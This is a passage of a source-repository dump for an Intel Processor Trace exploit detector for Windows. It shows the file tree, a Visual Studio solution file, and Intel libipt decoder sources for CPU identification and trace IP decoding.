├── .gitignore ├── LICENSE ├── Projects ├── PtExploitDetector │ ├── EntryPoint.cpp │ ├── IntelPt.h │ ├── PtExploitDetector.cpp │ ├── PtExploitDetector.h │ ├── PtExploitDetector.rc │ ├── PtExploitDetector.sln │ ├── PtExploitDetector.vcxproj │ ├── PtExploitDetector.vcxproj.filters │ ├── UndocNt.h │ ├── decoder │ │ ├── basic_include │ │ │ ├── inttypes.h │ │ │ └── threads.h │ │ ├── intel-pt.h │ │ ├── libipt.lib │ │ ├── libipt.txt │ │ ├── pt_cpu.cpp │ │ ├── pt_cpu.h │ │ ├── pt_cpuid.cpp │ │ ├── pt_cpuid.h │ │ ├── pt_last_ip.cpp │ │ ├── pt_last_ip.h │ │ ├── pt_time.cpp │ │ ├── pt_time.h │ │ └── ptdump.cpp │ ├── pt_dump.h │ ├── res │ │ ├── icon.ico │ │ ├── icon.png │ │ └── libipt.dll │ ├── resource.h │ ├── stdafx.cpp │ ├── stdafx.h │ └── targetver.h ├── PtExploitDetectorAgent │ ├── Executors │ │ ├── executors.h │ │ └── get_remote_function_address.cpp │ ├── PtExploitDetectorAgent.vcxproj │ ├── PtExploitDetectorAgent.vcxproj.filters │ ├── ReadMe.txt │ ├── dispatcher.cpp │ ├── dispatcher.h │ ├── dllmain.cpp │ ├── helpers.cpp │ └── helpers.h ├── PtExploitDetectorGUI │ ├── GeneratedFiles │ │ ├── qrc_PtExploitDetectorGUI.cpp │ │ └── ui_PtExploitDetectorGUI.h │ ├── PtExploitDetectorGUI.cpp │ ├── PtExploitDetectorGUI.h │ ├── PtExploitDetectorGUI.qrc │ ├── PtExploitDetectorGUI.ui │ ├── PtExploitDetectorGUI.vcxproj │ ├── PtExploitDetectorGUI.vcxproj.filters │ ├── Resources │ │ └── icon.ico │ └── main.cpp ├── WindowsPtDriver │ ├── Debug.cpp │ ├── Debug.h │ ├── DriverEntry.cpp │ ├── DriverEntry.h │ ├── DriverIo.cpp │ ├── DriverIo.h │ ├── Export.def │ ├── IntelPt.cpp │ ├── IntelPt.h │ ├── IntelPtXSave.cpp │ ├── IntelPtXSave.h │ ├── Intel_Defs.h │ ├── KernelTracing.cpp │ ├── KernelTracing.h │ ├── PtTests.cpp │ ├── UndocNt.h │ ├── WindowsIntelPtDriver.rc │ ├── WindowsIntelPtDriver.vcxproj │ ├── WindowsIntelPtDriver.vcxproj.filters │ ├── WindowsIntelPtDriver2015.sln │ ├── asm │ │ └── Amd64XSave.asm │ ├── resource.h │ ├── rules │ │ └── masm64.rules │ └── stdafx.h └── common │ ├── common.h │ ├── ipc.c │ ├── ipc.h │ ├── ipcpp.cpp │ └── ipcpp.h ├── README.md ├── Resources ├── Compiled_IntelPt │ ├── INSTDRV.EXE │ ├── INSTDRV_init_V01.bat │ ├── INSTDRV_init_V02.bat │ ├── V01 │ │ ├── Readme.md │ │ ├── WindowsPtDriver.cer │ │ ├── WindowsPtDriver.exp │ │ ├── WindowsPtDriver.lib │ │ └── WindowsPtDriver.sys │ ├── V02 │ │ ├── Readme.md │ │ ├── WindowsPtDriver.cer │ │ ├── WindowsPtDriver.exp │ │ ├── WindowsPtDriver.lib │ │ └── WindowsPtDriver.sys │ └── readme.md ├── Compiled_keystone │ ├── include │ │ ├── arm.h │ │ ├── arm64.h │ │ ├── hexagon.h │ │ ├── keystone.h │ │ ├── mips.h │ │ ├── ppc.h │ │ ├── sparc.h │ │ ├── systemz.h │ │ └── x86.h │ ├── x64 │ │ ├── keystone.dll │ │ └── keystone.lib │ └── x86 │ │ ├── keystone.dll │ │ └── keystone.lib ├── Compiled_libipt │ └── libipt.dll ├── Corelan_scripts │ ├── pvePushString.pl │ ├── pveReadbin.pl │ └── pveWritebin.pl ├── IdaPt.py ├── Plog │ ├── Log.h │ └── plog │ │ ├── Appenders │ │ ├── AndroidAppender.h │ │ ├── ColorConsoleAppender.h │ │ ├── ConsoleAppender.h │ │ ├── DebugOutputAppender.h │ │ ├── EventLogAppender.h │ │ ├── IAppender.h │ │ └── RollingFileAppender.h │ │ ├── Converters │ │ ├── NativeEOLConverter.h │ │ └── UTF8Converter.h │ │ ├── Formatters │ │ ├── CsvFormatter.h │ │ ├── FuncMessageFormatter.h │ │ ├── MessageOnlyFormatter.h │ │ └── TxtFormatter.h │ │ ├── Init.h │ │ ├── Logger.h │ │ ├── Record.h │ │ ├── Severity.h │ │ ├── Util.h │ │ └── WinApi.h ├── Rapidjson │ ├── allocators.h │ ├── cursorstreamwrapper.h │ ├── document.h │ ├── encodedstream.h │ ├── encodings.h │ ├── error │ │ ├── en.h │ │ └── error.h │ ├── filereadstream.h │ ├── filewritestream.h │ ├── fwd.h │ ├── internal │ │ ├── biginteger.h │ │ ├── diyfp.h │ │ ├── dtoa.h │ │ ├── ieee754.h │ │ ├── itoa.h │ │ ├── meta.h │ │ ├── pow10.h │ │ ├── regex.h │ │ ├── stack.h │ │ ├── strfunc.h │ │ ├── strtod.h │ │ └── swap.h │ ├── istreamwrapper.h │ ├── memorybuffer.h │ ├── memorystream.h │ ├── msinttypes │ │ ├── inttypes.h │ │ └── stdint.h │ ├── ostreamwrapper.h │ ├── pointer.h │ ├── prettywriter.h │ ├── rapidjson.h │ ├── reader.h │ ├── schema.h │ ├── stream.h │ ├── stringbuffer.h │ └── writer.h ├── TestExploitTool │ ├── TestExploitTool.c │ ├── TestExploitTool.vcxproj │ ├── TestExploitTool.vcxproj.filters │ ├── stdafx.c │ ├── stdafx.h │ └── targetver.h ├── TestTool │ ├── TestTool.sln │ ├── common │ │ ├── common.h │ │ ├── ipc.c │ │ ├── ipc.h │ │ ├── ipcpp.cpp │ │ └── ipcpp.h │ ├── payloads │ │ ├── payload_calc.json │ │ └── payload_cmd.json │ ├── testtool │ │ ├── Executors │ │ │ ├── exec_ropchain.cpp │ │ │ └── exec_ropchain.h │ │ ├── ReadMe.txt │ │ ├── cmdparser.h │ │ ├── executor.h │ │ ├── executorManager.cpp │ │ ├── executorManager.h │ │ ├── helpers.cpp │ │ ├── helpers.h │ │ ├── payload_schema.json │ │ ├── resource.h │ │ ├── testtool.cpp │ │ ├── testtool.rc │ │ ├── testtool.vcxproj │ │ └── testtool.vcxproj.filters │ └── testtoolagent │ │ ├── Executors │ │ ├── exec_rop_chain.cpp │ │ ├── executors.h │ │ └── get_remote_function_address.cpp │ │ ├── ReadMe.txt │ │ ├── dispatcher.cpp │ │ ├── dispatcher.h │ │ ├── dllmain.cpp │ │ ├── helpers.cpp │ │ ├── helpers.h │ │ ├── testtoolagent.vcxproj │ │ └── testtoolagent.vcxproj.filters └── loadLibrary_x86_address │ ├── loadLibrary_x86_address.sln │ └── loadLibrary_x86_address │ ├── ReadMe.txt │ ├── loadLibrary_x86_address.cpp │ ├── loadLibrary_x86_address.vcxproj │ ├── loadLibrary_x86_address.vcxproj.filters │ ├── stdafx.cpp │ ├── stdafx.h │ └── targetver.h └── WindowsIntelPt.sln /Projects/PtExploitDetector/EntryPoint.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Projects/PtExploitDetector/EntryPoint.cpp -------------------------------------------------------------------------------- /Projects/PtExploitDetector/IntelPt.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Projects/PtExploitDetector/IntelPt.h -------------------------------------------------------------------------------- /Projects/PtExploitDetector/PtExploitDetector.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Projects/PtExploitDetector/PtExploitDetector.cpp -------------------------------------------------------------------------------- /Projects/PtExploitDetector/PtExploitDetector.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Projects/PtExploitDetector/PtExploitDetector.h -------------------------------------------------------------------------------- /Projects/PtExploitDetector/PtExploitDetector.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Projects/PtExploitDetector/PtExploitDetector.rc -------------------------------------------------------------------------------- /Projects/PtExploitDetector/PtExploitDetector.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 14 4 | VisualStudioVersion = 14.0.24720.0 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "PtExploitDetector", "PtExploitDetector.vcxproj", "{AEEB84F9-A268-4642-8CCC-CE05D80ACD74}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {AEEB84F9-A268-4642-8CCC-CE05D80ACD74}.Debug|x64.ActiveCfg = Debug|x64 17 | {AEEB84F9-A268-4642-8CCC-CE05D80ACD74}.Debug|x64.Build.0 = Debug|x64 18 | {AEEB84F9-A268-4642-8CCC-CE05D80ACD74}.Debug|x86.ActiveCfg = Debug|x64 19 | {AEEB84F9-A268-4642-8CCC-CE05D80ACD74}.Release|x64.ActiveCfg = Release|x64 20 | {AEEB84F9-A268-4642-8CCC-CE05D80ACD74}.Release|x64.Build.0 = Release|x64 21 | {AEEB84F9-A268-4642-8CCC-CE05D80ACD74}.Release|x86.ActiveCfg = Release|x64 22 | EndGlobalSection 23 | GlobalSection(SolutionProperties) = preSolution 24 | HideSolutionNode = FALSE 25 | EndGlobalSection 26 | EndGlobal 27 | -------------------------------------------------------------------------------- /Projects/PtExploitDetector/UndocNt.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Projects/PtExploitDetector/UndocNt.h -------------------------------------------------------------------------------- /Projects/PtExploitDetector/decoder/basic_include/inttypes.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2013-2016, Intel Corporation 3 | * 4 | * Redistribution and use in source and binary forms, with or without 5 | * modification, are permitted provided that the following conditions are met: 6 | * 7 | * * Redistributions of source code must retain the above copyright notice, 8 | * this list of conditions and the following disclaimer. 9 | * * Redistributions in binary form must reproduce the above copyright notice, 10 | * this list of conditions and the following disclaimer in the documentation 11 | * and/or other materials provided with the distribution. 12 | * * Neither the name of Intel Corporation nor the names of its contributors 13 | * may be used to endorse or promote products derived from this software 14 | * without specific prior written permission. 15 | * 16 | * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 17 | * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 18 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 19 | * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE 20 | * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 21 | * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF 22 | * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS 23 | * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN 24 | * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) 25 | * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | * POSSIBILITY OF SUCH DAMAGE. 27 | */ 28 | 29 | #include 30 | #include 31 | 32 | #ifndef PRId64 33 | # define PRId64 "lld" 34 | #endif 35 | #ifndef PRIu64 36 | # define PRIu64 "llu" 37 | #endif 38 | #ifndef PRIx64 39 | # define PRIx64 "llx" 40 | #endif 41 | 42 | #ifndef PRId32 43 | # define PRId32 "d" 44 | #endif 45 | #ifndef PRIu32 46 | # define PRIu32 "u" 47 | #endif 48 | #ifndef PRIx32 49 | # define PRIx32 "x" 50 | #endif 51 | 52 | #ifndef PRIu16 53 | # define PRIu16 "u" 54 | #endif 55 | 56 | #ifndef PRIu8 57 | # define PRIu8 "u" 58 | #endif 59 | #ifndef PRIx8 60 | # define PRIx8 "x" 61 | #endif 62 | 63 | #ifndef SCNx64 64 | # define SCNx64 "llx" 65 | #endif 66 | -------------------------------------------------------------------------------- /Projects/PtExploitDetector/decoder/libipt.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Projects/PtExploitDetector/decoder/libipt.lib -------------------------------------------------------------------------------- /Projects/PtExploitDetector/decoder/pt_cpu.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2013-2016, Intel Corporation 3 | * 4 | * Redistribution and use in source and binary forms, with or without 5 | * modification, are permitted provided that the following conditions are met: 6 | * 7 | * * Redistributions of source code must retain the above copyright notice, 8 | * this list of conditions and the following disclaimer. 9 | * * Redistributions in binary form must reproduce the above copyright notice, 10 | * this list of conditions and the following disclaimer in the documentation 11 | * and/or other materials provided with the distribution. 12 | * * Neither the name of Intel Corporation nor the names of its contributors 13 | * may be used to endorse or promote products derived from this software 14 | * without specific prior written permission. 15 | * 16 | * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 17 | * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 18 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 19 | * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE 20 | * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 21 | * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF 22 | * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS 23 | * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN 24 | * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) 25 | * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | * POSSIBILITY OF SUCH DAMAGE. 27 | */ 28 | 29 | #include "pt_cpuid.h" 30 | 31 | #include "intel-pt.h" 32 | 33 | #include 34 | #include 35 | 36 | 37 | const char *cpu_vendors[] = { 38 | "", 39 | "GenuineIntel" 40 | }; 41 | 42 | enum { 43 | pt_cpuid_vendor_size = 12 44 | }; 45 | 46 | union cpu_vendor { 47 | /* The raw data returned from cpuid. */ 48 | struct { 49 | uint32_t ebx; 50 | uint32_t edx; 51 | uint32_t ecx; 52 | } cpuid; 53 | 54 | /* The resulting vendor string. */ 55 | char vendor_string[pt_cpuid_vendor_size]; 56 | }; 57 | 58 | static enum pt_cpu_vendor cpu_vendor(void) 59 | { 60 | union cpu_vendor vendor; 61 | uint32_t eax; 62 | size_t i; 63 | 64 | memset(&vendor, 0, sizeof(vendor)); 65 | eax = 0; 66 | 67 | pt_cpuid(0u, &eax, &vendor.cpuid.ebx, &vendor.cpuid.ecx, 68 | &vendor.cpuid.edx); 69 | 70 | for (i = 0; i < sizeof(cpu_vendors)/sizeof(*cpu_vendors); i++) 71 | if (strncmp(vendor.vendor_string, 72 | cpu_vendors[i], pt_cpuid_vendor_size) == 0) 73 | return (enum pt_cpu_vendor) i; 74 | 75 | return pcv_unknown; 76 | } 77 | 78 | static uint32_t cpu_info(void) 79 | { 80 | uint32_t eax, ebx, ecx, edx; 81 | 82 | eax = 0; 83 | ebx = 0; 84 | ecx = 0; 85 | edx = 0; 86 | pt_cpuid(1u, &eax, &ebx, &ecx, &edx); 87 | 88 | return eax; 89 | } 90 | 91 | int pt_cpu_parse(struct pt_cpu *cpu, const char *s) 92 | { 93 | const char sep = '/'; 94 | char *endptr; 95 | long family, model, stepping; 96 | 97 | if (!cpu || !s) 98 | return -pte_invalid; 99 | 100 | family = strtol(s, &endptr, 0); 101 | if (s == endptr || *endptr == '\0' || *endptr != sep) 102 | return -pte_invalid; 103 | 104 | if (family < 0 || family > USHRT_MAX) 105 | return -pte_invalid; 106 | 107 | /* skip separator */ 108 | s = endptr + 1; 109 | 110 | model = strtol(s, &endptr, 0); 111 | if (s == endptr || (*endptr != '\0' && *endptr != sep)) 112 | return -pte_invalid; 113 | 114 | if (model < 0 || model > UCHAR_MAX) 115 | return -pte_invalid; 116 | 117 | if (*endptr == '\0') 118 | /* stepping was omitted, it defaults to 0 */ 119 | stepping = 0; 120 | else { 121 | /* skip separator */ 122 | s = endptr + 1; 123 | 124 | stepping = strtol(s, &endptr, 0); 125 | if (*endptr != '\0') 126 | return -pte_invalid; 127 | 128 | if (stepping < 0 || stepping > UCHAR_MAX) 129 | return -pte_invalid; 130 | } 131 | 132 | cpu->vendor = pcv_intel; 133 | cpu->family = (uint16_t) family; 134 | cpu->model = (uint8_t) model; 135 | cpu->stepping = (uint8_t) stepping; 136 | 137 | return 0; 138 | } 139 | 140 | int pt_cpu_read(struct pt_cpu *cpu) 141 | { 142 | uint32_t info; 143 | uint16_t family; 144 | 145 | if (!cpu) 146 | return -pte_invalid; 147 | 148 | cpu->vendor = cpu_vendor(); 149 | 150 | info = cpu_info(); 151 | 152 | cpu->family = family = (info>>8) & 0xf; 153 | if (family == 0xf) 154 | cpu->family += (info>>20) & 0xf; 155 | 156 | cpu->model = (info>>4) & 0xf; 157 | if (family == 0x6 || family == 0xf) 158 | cpu->model += (info>>12) & 0xf0; 159 | 160 | cpu->stepping = (info>>0) & 0xf; 161 | 162 | return 0; 163 | } 164 | -------------------------------------------------------------------------------- /Projects/PtExploitDetector/decoder/pt_cpu.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2013-2016, Intel Corporation 3 | * 4 | * Redistribution and use in source and binary forms, with or without 5 | * modification, are permitted provided that the following conditions are met: 6 | * 7 | * * Redistributions of source code must retain the above copyright notice, 8 | * this list of conditions and the following disclaimer. 9 | * * Redistributions in binary form must reproduce the above copyright notice, 10 | * this list of conditions and the following disclaimer in the documentation 11 | * and/or other materials provided with the distribution. 12 | * * Neither the name of Intel Corporation nor the names of its contributors 13 | * may be used to endorse or promote products derived from this software 14 | * without specific prior written permission. 15 | * 16 | * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 17 | * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 18 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 19 | * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE 20 | * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 21 | * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF 22 | * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS 23 | * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN 24 | * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) 25 | * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | * POSSIBILITY OF SUCH DAMAGE. 27 | */ 28 | 29 | #ifndef PT_CPU_H 30 | #define PT_CPU_H 31 | 32 | struct pt_cpu; 33 | 34 | /* Parses @s which should be of format family/model[/stepping] and 35 | * stores the value in @cpu on success. 36 | * The optional stepping defaults to 0 if omitted. 37 | * 38 | * Returns 0 on success. 39 | * Returns -pte_invalid if @cpu or @s is NULL. 40 | * Returns -pte_invalid if @s could not be parsed. 41 | */ 42 | extern int pt_cpu_parse(struct pt_cpu *cpu, const char *s); 43 | 44 | /* Get the cpu we're running on. 45 | * 46 | * Reads the family/model/stepping of the processor on which this function 47 | * is executed and stores the value in @cpu. 48 | * 49 | * Returns zero on success, a negative error code otherwise. 50 | * Returns -pte_invalid if @cpu is NULL. 51 | */ 52 | extern int pt_cpu_read(struct pt_cpu *cpu); 53 | 54 | #endif /* PT_CPU_H */ 55 | -------------------------------------------------------------------------------- /Projects/PtExploitDetector/decoder/pt_cpuid.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2013-2016, Intel Corporation 3 | * 4 | * Redistribution and use in source and binary forms, with or without 5 | * modification, are permitted provided that the following conditions are met: 6 | * 7 | * * Redistributions of source code must retain the above copyright notice, 8 | * this list of conditions and the following disclaimer. 9 | * * Redistributions in binary form must reproduce the above copyright notice, 10 | * this list of conditions and the following disclaimer in the documentation 11 | * and/or other materials provided with the distribution. 12 | * * Neither the name of Intel Corporation nor the names of its contributors 13 | * may be used to endorse or promote products derived from this software 14 | * without specific prior written permission. 15 | * 16 | * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 17 | * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 18 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 19 | * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE 20 | * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 21 | * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF 22 | * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS 23 | * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN 24 | * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) 25 | * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | * POSSIBILITY OF SUCH DAMAGE. 27 | */ 28 | 29 | #include "pt_cpuid.h" 30 | 31 | #include 32 | 33 | extern void pt_cpuid(uint32_t leaf, uint32_t *eax, uint32_t *ebx, 34 | uint32_t *ecx, uint32_t *edx) 35 | { 36 | int cpu_info[4]; 37 | 38 | __cpuid(cpu_info, leaf); 39 | *eax = cpu_info[0]; 40 | *ebx = cpu_info[1]; 41 | *ecx = cpu_info[2]; 42 | *edx = cpu_info[3]; 43 | } 44 | -------------------------------------------------------------------------------- /Projects/PtExploitDetector/decoder/pt_cpuid.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2013-2016, Intel Corporation 3 | * 4 | * Redistribution and use in source and binary forms, with or without 5 | * modification, are permitted provided that the following conditions are met: 6 | * 7 | * * Redistributions of source code must retain the above copyright notice, 8 | * this list of conditions and the following disclaimer. 9 | * * Redistributions in binary form must reproduce the above copyright notice, 10 | * this list of conditions and the following disclaimer in the documentation 11 | * and/or other materials provided with the distribution. 12 | * * Neither the name of Intel Corporation nor the names of its contributors 13 | * may be used to endorse or promote products derived from this software 14 | * without specific prior written permission. 15 | * 16 | * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 17 | * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 18 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 19 | * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE 20 | * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 21 | * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF 22 | * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS 23 | * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN 24 | * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) 25 | * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | * POSSIBILITY OF SUCH DAMAGE. 27 | */ 28 | 29 | #ifndef PT_CPUID_H 30 | #define PT_CPUID_H 31 | 32 | #include 33 | 34 | /* Execute cpuid with @leaf set in the eax register. 35 | * The result is stored in @eax, @ebx, @ecx and @edx. 36 | */ 37 | extern void pt_cpuid(uint32_t leaf, uint32_t *eax, uint32_t *ebx, 38 | uint32_t *ecx, uint32_t *edx); 39 | 40 | #endif /* PT_CPUID_H */ 41 | -------------------------------------------------------------------------------- /Projects/PtExploitDetector/decoder/pt_last_ip.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2013-2016, Intel Corporation 3 | * 4 | * Redistribution and use in source and binary forms, with or without 5 | * modification, are permitted provided that the following conditions are met: 6 | * 7 | * * Redistributions of source code must retain the above copyright notice, 8 | * this list of conditions and the following disclaimer. 9 | * * Redistributions in binary form must reproduce the above copyright notice, 10 | * this list of conditions and the following disclaimer in the documentation 11 | * and/or other materials provided with the distribution. 12 | * * Neither the name of Intel Corporation nor the names of its contributors 13 | * may be used to endorse or promote products derived from this software 14 | * without specific prior written permission. 15 | * 16 | * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 17 | * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 18 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 19 | * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE 20 | * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 21 | * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF 22 | * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS 23 | * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN 24 | * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) 25 | * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | * POSSIBILITY OF SUCH DAMAGE. 27 | */ 28 | 29 | #include "pt_last_ip.h" 30 | 31 | #include "intel-pt.h" 32 | 33 | 34 | void pt_last_ip_init(struct pt_last_ip *last_ip) 35 | { 36 | if (!last_ip) 37 | return; 38 | 39 | last_ip->ip = 0ull; 40 | last_ip->have_ip = 0; 41 | last_ip->suppressed = 0; 42 | } 43 | 44 | int pt_last_ip_query(uint64_t *ip, const struct pt_last_ip *last_ip) 45 | { 46 | if (!last_ip) 47 | return -pte_invalid; 48 | 49 | if (!last_ip->have_ip) { 50 | if (ip) 51 | *ip = 0ull; 52 | return -pte_noip; 53 | } 54 | 55 | if (last_ip->suppressed) { 56 | if (ip) 57 | *ip = 0ull; 58 | return -pte_ip_suppressed; 59 | } 60 | 61 | if (ip) 62 | *ip = last_ip->ip; 63 | 64 | return 0; 65 | } 66 | 67 | /* Sign-extend a uint64_t value. */ 68 | static uint64_t sext(uint64_t val, uint8_t sign) 69 | { 70 | uint64_t signbit, mask; 71 | 72 | signbit = 1ull << (sign - 1); 73 | mask = ~0ull << sign; 74 | 75 | return val & signbit ? val | mask : val & ~mask; 76 | } 77 | 78 | int pt_last_ip_update_ip(struct pt_last_ip *last_ip, 79 | const struct pt_packet_ip *packet, 80 | const struct pt_config *config) 81 | { 82 | (void) config; 83 | 84 | if (!last_ip || !packet) 85 | return -pte_invalid; 86 | 87 | switch (packet->ipc) { 88 | case pt_ipc_suppressed: 89 | last_ip->suppressed = 1; 90 | return 0; 91 | 92 | case pt_ipc_sext_48: 93 | last_ip->ip = sext(packet->ip, 48); 94 | last_ip->have_ip = 1; 95 | last_ip->suppressed = 0; 96 | return 0; 97 | 98 | case pt_ipc_update_16: 99 | last_ip->ip = (last_ip->ip & ~0xffffull) 100 | | (packet->ip & 0xffffull); 101 | last_ip->have_ip = 1; 102 | last_ip->suppressed = 0; 103 | return 0; 104 | 105 | case pt_ipc_update_32: 106 | last_ip->ip = (last_ip->ip & ~0xffffffffull) 107 | | (packet->ip & 0xffffffffull); 108 | last_ip->have_ip = 1; 109 | last_ip->suppressed = 0; 110 | return 0; 111 | 112 | case pt_ipc_update_48: 113 | last_ip->ip = (last_ip->ip & ~0xffffffffffffull) 114 | | (packet->ip & 0xffffffffffffull); 115 | last_ip->have_ip = 1; 116 | last_ip->suppressed = 0; 117 | return 0; 118 | 119 | case pt_ipc_full: 120 | last_ip->ip = packet->ip; 121 | last_ip->have_ip = 1; 122 | last_ip->suppressed = 0; 123 | return 0; 124 | } 125 | 126 | return -pte_bad_packet; 127 | } 128 | -------------------------------------------------------------------------------- /Projects/PtExploitDetector/decoder/pt_last_ip.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2013-2016, Intel Corporation 3 | * 4 | * 